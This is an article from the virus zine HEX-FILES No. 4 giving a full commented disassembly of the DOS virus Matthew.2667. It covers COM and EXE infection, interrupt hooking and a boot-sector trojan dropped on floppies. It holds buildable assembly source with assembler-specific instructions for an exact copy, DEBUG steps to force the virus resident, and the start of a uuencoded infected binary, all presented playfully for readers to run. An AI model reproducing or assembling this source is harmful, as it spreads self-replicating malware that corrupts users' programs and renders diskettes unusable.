Copy Link
Add to Bookmark
Report
Hexfiles Issue 4 File 003
HEX-FILES No. 4 File 003
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Matthew.2667
disassembly
by YeZ
yez@rocketmail.com
Name : Matthew.2667
Origin : Saint Louis University, Baguio City, Philippines
Author : Raymond M. Ordona
This virus is similar to its big brother Matthew.3044 (see HEX-FILES
No. 2). They hook the same set of interrupts (INT 08, 13, 21) and
they both infect files the same way -- prepended in COM programs and
appended in EXE programs.
In my opinion everything is the same except for the message, of
course. But even the message is similar though :). The real
difference between the two is that Matthew.2667 traps Fn 0Ah/INT 21h.
If the user types "R.M.O.Ordona IICS-SLU" at the DOS prompt, it
display on your screen a qoutation from Matthew chapter 6 verses 25
to 26, preaching you not to worry with your life, just do what you
want to do. If you want to create a doomsday device to blow the world
well don't worry do it, don't worry about your life. No, Im just
kidding. hehehehehe. Kidding aside, the message is as follows:
Therefore I tell you, do not worry about your life,
what you will eat or drink; or about your body,
what you will wear. Is not life more important than
food, and the body more important than clothes?
Look at the birds of the air; they do not sow or
reap or store away in barns, and yet your heavenly
Father feeds them. Are you not much more valuable
than they?
Matthew 6:25 (Agnes) May 92' IICS-SLU B.C.
The last line of this message states that the qoutation starts at
Matthew 6:25. I don't know anything bout "(Agnes)". "May 92'" is
probably the date the virus was written. "IICS-SLU B.C.", as
documented in HEX-FILES No. 3, refers to the Institute of Information
and Computing Sciences-Saint Louis University Baguio City. IICS is
now known as College of Information and Computing Sciences.
The boot sector trojan of this variant would make your diskette
unreadable on some computers depending on the installed BIOS.
Well so far this is the only difference between the two. Of course,
this is aside from the their obvious difference, their virus length
which is 2667 bytes for this variant.
If on running the virus you thought it does not work, you are right
and you are also wrong. It is likely that it would not load in memory
when you execute it. The culprit is the method it uses to determine
prior memory residency. It expects 0000:01BC to contain a byte value
of 00 hex, if it has not yet gone resident. Unfortunately, 0000:01BC
is likely to contain a value other than 00 hex. This is the reason
why this variant is not as widely distributed as the 3044 variant.
If the virus does not seem to work, check 0000:01BC if it has a non-
zero hex value. If it contains 01 hex, the virus is resident and
there are something that prevents the virus from infecting files. To
check, try this:
Load DEBUG.EXE and enter "d 0:1bc 1bc" (without the quotes) on the
debug prompt. If the value returned is not 00 hex, enter "e 0:1bc 0"
(without the quotes). Exit debug by typing "q" (again, without the
quotes). You have to press the enter key after typing each debug
command for it to execute. You could now execute the virus and it
would work as it is intended to be.
What would happen if you change the content of 0000:01BC? I don't
know. So far, nothing happens out of the ordinary. But if you're
scared out of your wits, you could always reboot after playing
around with the virus.
When playing with a virus, always remember that you are handling a
program that is capable of replicating and, at times, creating havoc.
So careful when toying around with this programs.
Have fun.
ÄÄ MATT2667.ASM STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±
;± WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING
;± WARNING*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*WARNING
;± WARNING*±±±±±±±±±± ±±±±±±±±±±*WARNING
;± WARNING*±±±±±±±±±± VIRUS DROPS TROJAN IN BOOT SECTOR ±±±±±±±±±±*WARNING
;± WARNING*±±±±±±±±±± ±±±±±±±±±±*WARNING
;± WARNING*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*WARNING
;± WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING
;±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± ±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± HEX-FILES No 4 ±±±
;±±±±±± ±±±±±±±±±±± ±±±
;±±±±±± Virus Name: Matthew.2667 ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±± Author : Raymond M. Ordona ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±± Origin : Saint Louis University ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±± Baguio City, Philippines ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±± ±±±±±±±±±±±
;±±±±±±±±±± Program listing created by YeZ <yez@rocketmail.com> ±±±±±±±±±±±
;±±±±±±±±±± ±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±± ±±±± ±±±
;±±±±±± COMPILING ±±±± This virus was originally compiled in MASM 5.0 ±±±
;±±±±±± INSTRUCTION ±±±± This could only be compiled without correction ±±±
;±±±±±± ±±±± in MASM 5.0. ±±±
;±±±±±±±±±±±±±±±±±±±±±±± ±±±
;±±±±±±±±±±±±±±±±±±±±±±± You would have to code a NOP nine lines after ±±±
;±±±±±±±±±±±±±±±±±±±±±±± "InfectSystem:" if you want to use TASM 2.01 ±±±
;±±±±±±±±±±±±±±±±±±±±±±± to get an exact copy of the virus. Then ±±±
;±±±±±±±±±±±±±±±±±±±±±±± compile in TASM without options/switches. ±±±
;±±±±±±±±±±±±±±±±±±±±±±± ±±±
;±±±±±±±±±±±±±±±±±±±±±±± To use A86 4.02, you would need to code the ±±±
;±±±±±±±±±±±±±±±±±±±±±±± "CS:" segment override. All memory operands ±±±
;±±±±±±±±±±±±±±±±±±±±±±± following the assume directives which specify ±±±
;±±±±±±±±±±±±±±±±±±±±±±± DS as nothing should be coded with CS: segment ±±±
;±±±±±±±±±±±±±±±±±±±±±±± override. Without these, A86 assumes the ±±±
;±±±±±±±±±±±±±±±±±±±±±±± segment as DS, which would be erroneous in ±±±
;±±±±±±±±±±±±±±±±±±±±±±± some instances. Using A86 would certainly ±±±
;±±±±±±±±±±±±±±±±±±±±±±± create a new variant. ±±±
;±±±±±±±±±±±±±±±±±±±±±±± ±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±± ±±± ±±±±±±±±±±±±±±±±±±±± ±
;±±±±± Greetz: ±±± Well here it is enjoy!!!... ±±±±±±±±±±±±±±±±±±±± |YeZ| ±
;±±±±± ±±± ±±±±±±±±±±±±±±±±±±±± ±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;
ExeHeaderStruc struc
ExeSig dw ?
ExeImgLng dw ?
ExeSecLng dw ?
ExeRelocItm dw ?
ExeHeadLng dw ?
ExeMinAlloc dw ?
ExeMaxAlloc dw ?
ExeSsGap dw ?
ExeSpLng dw ?
ExeWrdChk dw ?
ExeIpEntry dw ?
ExeCsGap dw ?
Exe1stReloc dw ?
ExeOvlNum dw ?
ExeHeaderStruc ends
YeZ_DisAsm segment 'code'
assume cs:YeZ_DisAsm,ds:nothing
Ivt08 equ 8*4
Ivt13 equ 13h*4
Ivt6E equ 6eh*4
TsrMark equ 6fh*4
M2667 equ offset First_Generation - offset Matthew_2667
rxz equ 2667
org 100h
Matthew_2667:
jmp First_Generation
db 13,13,32,32,32,32 ; erases entry point jmp on TYPE
StartMat2667Msg db 10,13,10,13
MatthewMsg label byte
db 'Therefore I tell you, do not worry about your life,',13,10
db 'what you will eat or drink; or about your body,' ,13,10
db 'what you will wear. Is not life more important than',13,10
db 'food, and the body more important than clothes?' ,13,10
db 'Look at the birds of the air; they do not sow or' ,13,10
db 'reap or store away in barns, and yet your heavenly' ,13,10
db 'Father feeds them. Are you not much more valuable' ,13,10
db 'than they?' ,13,10,13,10
db 4 dup (' ')
db "Matthew 6:25 (Agnes) May 92' IICS-SLU B.C."
MatthewMsgLen equ $-MatthewMsg
db 10,13,'$'
db 13,32,13,10,0,1ah ; this ends the message when TYPE is
; to view an infected COM program
VirChkS1 dw 92a1h ;//--
VirChkS2 dw 505h ;\\-- infection markers
VirusSize dw M2667 ; virus length
SecExe dw ?
LgtExe dw ?
CSExe dw ?
IPExe dw ?
SSExe dw ?
SPExe dw ?
ChkSumExe dw ?
ECSCount db ?
Psp dw ?
dw ? ;hhhhmmmm....????
FileType db ?
db 1 ;hhhaaahhh????
Int21 dd ?
Int08 dd ?
Int24 dd ?
Int13 dd ?
Entry1:
jmp EntryVir
ExeHostEntry dd ?
HostName db 50h dup (?)
db '$' ;hhhheeeehhhhh????
HostHandle dw ?
HostAttr dw ?
HostSize dw ?
RAMBlk dw ?
HostDate dw ?
HostTime dw ?
HostSizeLo dw ?
HostSizeHi dw ?
EnvFile dd ?
DosVer db ?
EnvSeg dw ?
Int8Proc: ; Int 8 handler
pushf ; does nothing other than set TSR ID
call [Int08]
push es
push ax
xor ax,ax
mov es,ax
mov byte ptr es:[TsrMark],1 ;set tsr self-recognition
pop ax
pop es
iret
RetSsSpInt24: ;Int 24 handler
xor ax,ax ; ain't it similar to Possessed????
mov es,ax
mov ss,word ptr es:[Ivt6E]
mov sp,word ptr es:[Ivt6E][2]
pop ax
pop es
pop bp
stc
ret
GetSsSpOnInt21Call: ;Calls original Int 21 handler
push bp ; another of Possessed's heritage :)
push es
push ax
xor ax,ax
mov es,ax
mov word ptr es:[Ivt6E],ss
mov word ptr es:[Ivt6E][2],sp
pop ax
pop es
pushf
call [Int21]
pop bp
ret
GetHostName: ;Copy host name
push ds
push cs
pop ds
mov di,offset HostName
mov ax,ds
pop ds
mov es,ax
mov si,dx
mov cx,80
cld
rep movsb
ret
GotoBegPtrHost: ; moves pointer to begin of file
xor cx,cx
mov dx,cx
mov ax,4200h
call GetSsSpOnInt21Call
ret
BogusBootBlk: ;Entry point of our Trojan Boot block
jmp BogusBootBegin
db 1ah
; This holds the encrypted copy of the message you would see
; at the start of the virus. EncMatthewMsg and BootMess are displayed
; by the trojan if diskette is used to boot your computer.
EncMatthewMsg db MatthewMsgLen dup (?)
BootMess db 13,10,13,10,'System Disk Needed...',10,10,13,'$'
BootMessLen equ $-BootMess
DisplayBogusMsg:
mov ah,0eh ;Display our message...
mov bx,16h
mov cx,1
int 10h
ret
DecryptBogusDat:
mov al,byte ptr [si] ; get a character of the message
cmp al,'$'+'9' ; is it '$'
je DoneDecrypt ; then we're through with the message
sub al,'9' ; else, decrypt it...
call DisplayBogusMsg ; ...and show it.
inc si ; get next character
jmp DecryptBogusDat
DoneDecrypt:
ret
CallGetDelta:
jmp GetDelta
BogusBootBegin: ;Set SS and SP on boot
xor ax,ax
mov ss,ax
mov sp,7c00h
call CallGetDelta
GetDelta: ;Get our Data offset
pop di
mov ax,(offset GetDelta - offset EncMatthewMsg)
sub di,ax
push cs
pop ds
RepeatShow:
mov si,di
call DecryptBogusDat
xor ax,ax ; pause till next key press....
int 16h ; ...that is user insert system disk
int 19h ; reboot!
jmp RepeatShow ; <--- author only too careful :)
db 55h,0aah ; bootable disk sig
DecryptMatthew625: ; Makes clean copy of message on
push cs ; new infection
pop ds
mov cx,MatthewMsgLen
mov di,offset Matthew_2667 + 13
mov si,offset EncMatthewMsg
cld
DecryMatthew625Loop:
mov ax,ds
mov es,ax
mov al,[si]
sub al,'9'
mov es:[di],al
inc di
inc si
loop DecryMatthew625Loop
ret
;
; Is R.M.O. Ordona the author or is it dedicated to him/her????
; Still remember Prof. Hermilito Go of MSU? :)
;
; Anybody from Baguio City, esp. SLU, who could shed light on this????
;
RMO_Ordona db 'R.M.O.Ordona IICS-SLU'
RMO_OrdonaLen equ $-RMO_Ordona
DecryptRmoOrdona: ; decrypts RMO_Ordona when it TSR
push ds
push cs
pop ds
mov si,offset RMO_Ordona
mov cx,RMO_OrdonaLen
DecryptOrdonaLoop:
sub byte ptr [si],'$'
inc si
loop DecryptOrdonaLoop
pop ds
ret
EncryptRmoOrdona: ; encrypts RMO_Ordona on file infect
push ds
push cs
pop ds
mov si,offset RMO_Ordona
mov cx,RMO_OrdonaLen
EncryptOrdonaLoop:
add byte ptr [si],'$'
inc si
loop EncryptOrdonaLoop
pop ds
ret
COMInfectHost: ; write virus to COM program
push ds
call EncryptRmoOrdona
pop ds
mov dx,offset Matthew_2667
mov cx,[VirusSize]
mov ah,40h
mov bx,[HostHandle]
call GetSsSpOnInt21Call
push ds
call DecryptRmoOrdona
pop ds
ret
GetDiskSize: ; get disks free space
mov ah,36h
mov dl,0
call GetSsSpOnInt21Call
cmp ax,0ffffh
jne ConvertSize2Bytes
BytesNotSuffice:
stc
ret
ConvertSize2Bytes: ; is free space less than virus length?
xor dx,dx
mul bx
mul cx
or dx,dx
jnz MoreBytes
cmp ax,[VirusSize]
jb BytesNotSuffice
MoreBytes:
ret
assume cs:YeZ_DisAsm,ds:YeZ_DisAsm
InfectHostRoutine: ; copy exec program name
call GetHostName ; and hook int 24
push cs
pop ds
mov ax,3524h
call GetSsSpOnInt21Call
mov word ptr [Int24][2],es
mov word ptr [Int24],bx
mov ax,2524h
mov dx,offset RetSsSpInt24
call GetSsSpOnInt21Call
jmp Cont1IHR
assume cs:YeZ_DisAsm,ds:nothing
RetInt24: ; restores int 24
mov ax,2524h
mov dx,word ptr [Int24]
mov ds,word ptr [Int24][2]
call GetSsSpOnInt21Call
ret
Cont1IHR: ;Prepare the host for infection...
call GetDiskSize
jc RetInt24
mov dx,offset HostName
mov ax,4300h ; save file attribute
call GetSsSpOnInt21Call
jc RetInt24
mov [HostAttr],cx
mov ax,4301h
mov cx,20h ; clear hid-sys-r/o attributes
call GetSsSpOnInt21Call
jc RetInt24
mov ax,3d02h ; open file read/write
call GetSsSpOnInt21Call
jc RetInt24
mov [HostHandle],ax ; save file handle
mov bx,ax
mov ax,5700h ; save file time/date stamp
call GetSsSpOnInt21Call
mov [HostDate],dx
mov [HostTime],cx
mov bx,0fffeh ; allocate maximum free memory
mov ah,48h
call GetSsSpOnInt21Call
jnc GetAllocRamBlk
mov ah,48h
call GetSsSpOnInt21Call
jc RetInt24
GetAllocRamBlk:
mov [RAMBlk],ax ; Save allocated memory segment
xor cx,cx
mov dx,cx
mov bx,[HostHandle]
mov ax,4202h ; get file length
call GetSsSpOnInt21Call
jc OnError1
mov [HostSize],ax ; save low word of file length
call GotoBegPtrHost ; move pointer to begin of file
jc OnError1
mov cx,[HostSize] ; read entire COM file or all/portion
xor dx,dx ; of EXE program from start.
mov ds,[RAMBlk]
mov ah,3fh
call GetSsSpOnInt21Call
OnError1:
jc RetHostAll
xor si,si
mov byte ptr [FileType],1 ; initialize file type flag as COM
cmp word ptr [si].ExeSig,'ZM' ; Is it an Exe
je ExeHost
mov ax,[VirChkS1] ; ----------------- infection check
cmp [si+(offset VirChkS1 - offset Matthew_2667)],ax
je OnError2 ; exit already infected
mov ax,[VirChkS2] ;------------------ infection check
cmp [si+(offset VirChkS2 - offset Matthew_2667)],ax
je OnError2 ; exit already infected
call GotoBegPtrHost ; move pointer ot begin of file
jmp ChkCOMSize
OnError2:
jmp RetHostAll
ChkCOMSize:
mov ax,[HostSize]
add ax,[VirusSize]
cmp ax,0fde6h ; COM too big?
jnb OnError2
push cs
pop ds
call COMInfectHost ; write virus to start of file
mov bx,[HostHandle]
mov cx,[HostSize]
mov ds,[RAMBlk]
not word ptr ds:[0] ; encrypt first two bytes
xor dx,dx
mov ah,40h ; write host program after virus
call GetSsSpOnInt21Call
jmp RetHostAll ; done infect! clean up!!!!
ExeHost:
jmp ExeWriteVir
RetHostAll:
mov es,[RAMBlk] ; read allocated memory
mov ah,49h
call GetSsSpOnInt21Call
mov bx,[HostHandle] ; restore file time/date stamp
mov dx,[HostDate]
mov cx,[HostTime]
mov ax,5701h
call GetSsSpOnInt21Call
mov ah,3eh ; close file
call GetSsSpOnInt21Call
push cs
pop ds
mov dx,offset HostName
mov cx,[HostAttr]
mov ax,4301h ; restore file attribute
call GetSsSpOnInt21Call
ret
OnError3:
jmp RetHostAll
ExeWriteVir: ;This is the Exe infection routine
mov byte ptr [FileType],0
mov ds,[RAMBlk]
xor si,si ;All this 277x are checks for
cmp word ptr [si].ExeWrdChk,2770h ;Presence of infection in EXE
je OnError3
cmp word ptr [si].ExeWrdChk,2771h
je OnError3
cmp word ptr [si].ExeWrdChk,2772h
je OnError3
cmp word ptr [si].ExeWrdChk,2773h
je OnError3
cmp word ptr [si].ExeWrdChk,2774h
je OnError3
cmp word ptr [si].ExeWrdChk,2775h
je OnError3
cmp word ptr [si].ExeWrdChk,2776h
je OnError3
cmp word ptr [si].ExeWrdChk,2777h
je OnError3
cmp word ptr [si].ExeWrdChk,2778h
je OnError3
cmp word ptr [si].ExeWrdChk,2779h
je OnError3
push [si].ExeWrdChk ; get EXE checksum value
pop word ptr [ChkSumExe] ; and save
mov word ptr [si].ExeWrdChk,2770h ; set infect marker
mov ax,[si].ExeSsGap ; get SS displacement
add ax,10h ; adjust for PSP
mov [SSExe],ax ; and save
mov ax,[si].ExeSpLng ; get SP
mov [SPExe],ax ; and save
mov ax,[si].ExeIpEntry ; get IP
mov [IPExe],ax ; and save
mov ax,[si].ExeCsGap ; get CS displacement
add ax,10h ; adjust for PSP
mov [CSExe],ax ; and save
push word ptr [si].ExeSecLng ; get page blocks count
pop word ptr [SecExe] ; and save
push word ptr [si].ExeImgLng ; get bytes on last block
pop word ptr [LgtExe] ; and save
xor ax,ax
mov al,[ECSCount] ;this value is not modified by
add ax,2770h ;virus. might be set on first gen
mov [si].ExeWrdChk,ax ; set infection marker
mov ax,[si].ExeSecLng
cmp word ptr [si].ExeImgLng,0 ; get length of EXE
je NotDecAX
dec ax
NotDecAX:
mov bx,200h
mul bx
add ax,[si].ExeImgLng
adc dx,0 ; align orig EXE length to paragraph
add ax,0fh
adc dx,0
and ax,0fff0h
mov [HostSizeLo],ax
mov [HostSizeHi],dx
add ax,[VirusSize]
adc dx,0
jc OnError4
div bx
or dx,dx
jz NotIncAX
inc ax
NotIncAX:
mov [si].ExeSecLng,ax ; set new block count
mov [si].ExeImgLng,dx ; set bytes on last block
mov ax,[HostSizeLo]
mov dx,[HostSizeHi]
mov bx,16
div bx
sub ax,[si].ExeHeadLng
sub ax,16
mov [si].ExeCsGap,ax ; set virus CS displacement
mov word ptr [si].ExeIpEntry,offset Matthew_2667 ; set virus IP
mov [si].ExeSsGap,ax ; set virus SS displacement
mov word ptr [si].ExeSpLng,offset First_Generation+100h ; set virus SP
mov bx,[HostHandle]
call GotoBegPtrHost ; move pointer to beginning of file
mov cx,28
xor dx,dx
mov ah,40h ; write virus EXE header
call GetSsSpOnInt21Call
assume cs:YeZ_DisAsm,ds:YeZ_DisAsm
push cs
pop ds
mov dx,[HostSizeLo]
mov cx,[HostSizeHi]
mov ax,4200h ; move pointer to aligned end of file
call GetSsSpOnInt21Call
call COMInfectHost ; write virus code at end of file
OnError4:
jmp RetHostAll
ChkIfOurKeybIn: ; Checks if user have entered the magic phrase.
push es
push cs
pop es
mov di,offset RMO_Ordona
add dx,2
mov si,dx
mov cx,RMO_OrdonaLen
cld
repe cmpsb
jne NotOurKeybIn
mov si,dx
push ds
push cs
pop ds
mov dx,offset StartMat2667Msg ; Preach the user not to
mov ah,9 ; worry about LIFE!!!
int 21h
pop ds
dec si
mov byte ptr [si],0
mov word ptr [si][1],0a0dh
mov byte ptr [si][21],0
NotOurKeybIn:
pop es
ret
assume cs:YeZ_DisAsm,ds:nothing
BufKeybIn:
call [Int21]
pushf
push ds
push dx
call ChkIfOurKeybIn
pop dx
pop ds
popf
iret
Int21Proc: ; Int 21h handler
pushf
cmp ax,4b00h ;ExeCUTE PROGRAM shall we say?
jne NotExec
jmp InfectHost
NotExec:
cmp ah,0ah ;Or DOS buffered in key?
jne JmpRealInt21
jmp BufKeybIn
InfectHost: ;Yes Yes infect the file!!!!
push ds
push es
push si
push di
push ax
push bx
push cx
push dx
call InfectHostRoutine
pop dx
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
JmpRealInt21:
popf
jmp [Int21] ; return to int 21h chain
DiskPayload:
push ax
push bx
push cx
push dx
push es
push cs
pop es
mov bx,offset BogusBootBlk ; write boot sector trojan
mov ax,301h
mov cx,1
mov dh,0
pushf
call [Int13]
pop es
pop dx
pop cx
pop bx
pop ax
ret
Int13Proc: ; int 13h handler
pushf
cmp ah,0 ;Reset disk?
jne JmpRealInt13
test dl,80h ;Hard drive?
jne JmpRealInt13
cmp dl,2 ; >Drive B:?
je JmpRealInt13
call DiskPayload ;Drop our Boot trojan in DRIVE A: or B:
JmpRealInt13:
popf
jmp [Int13]
assume cs:YeZ_DisAsm,ds:YeZ_DisAsm
GetInt21: ; save int 21h
mov ax,3521h
int 21h
mov word ptr [Int21][2],es
mov word ptr [Int21],bx
ret
SetInt21: ; hook int 21h
mov ax,2521h
push cs
pop ds
mov dx,offset Int21Proc
int 21h
ret
GetInt8: ; save int 08
mov ax,3508h
int 21h
mov word ptr [Int08][2],es
mov word ptr [Int08],bx
ret
SetInt8: ; hook int 08
xor ax,ax
mov es,ax
mov word ptr es:[Ivt08][2],cs
mov ax,offset Int8Proc
mov word ptr es:[Ivt08],ax
ret
assume cs:YeZ_DisAsm,ds:nothing
GetInt13: ; save int 13
push es
mov ax,3513h
int 21h
mov word ptr [Int13][2],es
mov word ptr [Int13],bx
pop es
ret
SetInt13: ; hook int 13
push es
xor ax,ax
mov es,ax
mov word ptr es:[Ivt13][2],cs
mov ax,offset Int13Proc
mov word ptr es:[Ivt13],ax
pop es
ret
ReleaseAllocatedMemory: ; release allocated memory
mov ax,cs
mov es,ax
mov ds,ax
mov ah,49h
call GetSsSpOnInt21Call
ret
GetEnvironmentSegment: ; get environemnt segment
mov es,es:[2ch]
xor di,di
cld
mov al,0
EndOfFileSpec: ; get host file name in environment
cmp al,es:[di]
je GotEndOfFileSpec
mov cx,0ffffh
repne scasb
jmp EndOfFileSpec
GotEndOfFileSpec:
add di,3
mov word ptr [EnvFile][2],di
mov word ptr [EnvFile],es
ret
EntryVir: ;----------------- Enter the VIRUS the initial virus entry point :)
mov [Psp],es
call GetEnvironmentSegment
mov es,[Psp]
push es
xor ax,ax
mov es,ax ; checks 0:1bch if
cmp byte ptr es:[TsrMark],0 ; already TSR?
pop es
jne RamInfected
jmp InfectSystem
RamInfected:
jmp Ret2Host
Dyna2:
mov ax,es
cli
mov ss,ax
sub sp,10h
sti
mov ds,word ptr [ExeHostEntry][2]
mov si,word ptr [ExeHostEntry]
mov di,offset Dyna1
mov cx,(offset First_Generation - Offset Dyna1)
cld
rep movsb
mov ds,ax
call GetInt13 ; save and hook int 08, 13 and 21
call SetInt13
call GetInt21
call SetInt21
call GetInt8
call SetInt8
call DecryptMatthew625 ; make clean copy of message
call DecryptRmoOrdona ; decrypt "RMO Ordona"
call ReleaseAllocatedMemory ; release memory
push cs
pop es
push cs
pop ds
mov ax,word ptr es:[2ch] ; get environment segment
mov [EnvSeg],ax
mov si,0ah ; set terminate handler
mov di,offset First_Generation
mov cx,6
cld
rep movsw
mov bx,offset TerminateHandler
mov es:[0ah],bx
mov es:[0ch],cs
mov dx,offset First_Generation ; set TSR length
mov cx,4
shr dx,cl
add dx,20h
mov ah,31h ; go TSR
call GetSsSpOnInt21Call
TerminateHandler:
push cs
push cs
pop ds
mov es,[Psp]
mov si,offset First_Generation
mov di,0ah ; restore terminate handler
mov cx,6
cld
rep movsw
pop es
mov ax,[Psp]
mov si,offset First_Generation+15 ; create EXEC parameter block
mov [si][4],ax
mov word ptr [si][2],80h
mov [si][8],ax
mov word ptr [si][6],5ch
mov [si][12],ax
mov word ptr [si][10],6ch
mov ax,[EnvSeg]
mov [si],ax
mov ah,30h ; get DOS version
int 21h
mov [DosVer],al
cli
mov [SSExe],ss ; save SS and SP
mov [SPExe],sp
sti
mov ds,word ptr [EnvFile]
mov dx,word ptr [EnvFile][2]
mov ax,4b00h
mov bx,offset First_Generation + 15
cmp byte ptr [DosVer],3
jb UseInt21Exec
call GetSsSpOnInt21Call ; execute host
jmp NoMoreInt21
UseInt21Exec:
int 21h
NoMoreInt21:
cli
mov ss,[SSExe] ; restore SS and SP
mov sp,[SPExe]
sti
mov ah,4dh ; retrieve return code
int 21h
mov ah,4ch ; and terminate
int 21h
ComFileRet: ;Restore COM file host.
mov cx,[HostSize]
add cx,2
mov si,offset First_Generation ; move host code to ES:100
mov di,offset Matthew_2667
shr cx,1
cld
rep movsw
not word ptr es:[Matthew_2667]
mov bx,offset Matthew_2667
jmp bx ; execute COM host
Ret2Host:
cmp byte ptr [FileType],0 ; determine host type. EXE?
je ExeFileRet
mov di,0fde8h
mov cx,(offset Ret2Host - offset ComFileRet)
mov si,offset ComFileRet
cld
rep movsb ;copy host COM restorer to safe place
mov bx,0fde8h
jmp bx ; execute host COM restorer
ExeFileRet: ;Restore Exe Host
mov ax,es
add ax,[SSExe] ; set EXE host SS
mov ss,ax
mov sp,[SPExe] ; set EXE host SP
mov ax,es
add ax,[CSExe] ; set relocator to host entry point
mov word ptr [ExeHostEntry][2],ax
mov ax,[IPExe]
mov word ptr [ExeHostEntry],ax
clc
jmp [ExeHostEntry] ; execute EXE host
InfectSystem:
mov word ptr [ExeHostEntry][2],cs
mov word ptr [ExeHostEntry],offset Dyna1
mov di,offset Matthew_2667
push cs
pop ds
mov si,offset Matthew_2667 ; copy virus code to segment:100h
cld
mov cx,(Dyna1 - Matthew_2667)
;----------------------------------------\\\ fix for TASM 2.01
;----------------------------------------/// insert NOP here
Dyna1:
nop
rep movsb
push es
mov ax,offset Dyna2
push ax
retf
First_Generation:
mov word ptr [Matthew_2667][1],(Entry1-Matthew_2667)-3
mov si,offset MatthewMsg
mov di,offset EncMatthewMsg
mov cx,MatthewMsgLen
mov ah,'9'
cld
MakeEncryptCopy:
lodsb
add al,ah
stosb
loop MakeEncryptCopy
mov si,di
mov cx,BootMessLen
HideBootMess:
lodsb
add al,ah
stosb
loop HideBootMess
call GetInt8
call GetInt13
call GetInt21
jmp SetInts
YeZ db 13,10,7,'Matthew.2667 virus disassembly '
db 'by YeZ <yez@rocketmail.com>'
db 13,10,'for HEX-FILES No. 4',13,10,10,10,'$'
even
SetInts:
call SetInt13
call SetInt21
call SetInt8
push cs
pop es
mov ax,es:[2ch]
push ax
mov es,ax
mov ah,49h
int 21h
pop es
mov ah,49h
int 21h
mov dx,offset YeZ
mov ah,9
int 21h
mov dx,offset MatthewMsg
mov ah,9
int 21h
mov dx,offset First_Generation+200h
mov cl,4
shr dx,cl
mov ax,3100h
int 21h
YeZ_DisAsm ends
end Matthew_2667
ÄÄ MATT2667.ASM ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The following debug script was infected by a third generation of the
virus produced from compiling the program listing (see MATT2667.ASM
above) in MASM 5.0.
This is to remind everubody that this virus overwrites the boot sector
of a diskette in drive A or B with a trojan (message popper). This
would make your diskettes non-bootable. Trojanized diskettes would be
rendered unusuable depending on the BIOS installed in your computer.
Have pity on your diskettes! :)
ÄÄ MATT2667.UUE STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
begin 644 matt2667.com
MZ=\!#0T@("`@"@T*#51H97)E9F]R92!)('1E;&P@>6]U+"!D;R!N;W0@=V]R
M<GD@86)O=70@>6]U<B!L:69E+`T*=VAA="!Y;W4@=VEL;"!E870@;W(@9')I
M;FL[(&]R(&%B;W5T('EO=7(@8F]D>2P-"G=H870@>6]U('=I;&P@=V5A<BX@
M27,@;F]T(&QI9F4@;6]R92!I;7!O<G1A;G0@=&AA;@T*9F]O9"P@86YD('1H
M92!B;V1Y(&UO<F4@:6UP;W)T86YT('1H86X@8VQO=&AE<S\-"DQO;VL@870@
M=&AE(&)I<F1S(&]F('1H92!A:7([('1H97D@9&\@;F]T('-O=R!O<@T*<F5A
M<"!O<B!S=&]R92!A=V%Y(&EN(&)A<FYS+"!A;F0@>65T('EO=7(@:&5A=F5N
M;'D-"D9A=&AE<B!F965D<R!T:&5M+B!!<F4@>6]U(&YO="!M=6-H(&UO<F4@
M=F%L=6%B;&4-"G1H86X@=&AE>3\-"@T*("`@($UA='1H97<@-CHR-2`H06=N
M97,I($UA>2`Y,B<@24E#4RU33%4@0BY#+@H-)`T@#0H`&J&2!05K"A\`9@$`
M```!*`X*!@```&4/```!`?A`$0`\`+,-50$H#G0'<`#I]@9B"S0303I<34%4
M5#(V-C<N0T]-````````````````````````````````````````````````
M```````````````````````````````````````D!0`@`-`!/!!$)8H(<#T`
M`$\/+``&3P^<+O\>U@(&4#/`CL`FQ@:\`0%8!\\SP([`)HX6N`$FBR:Z`5@'
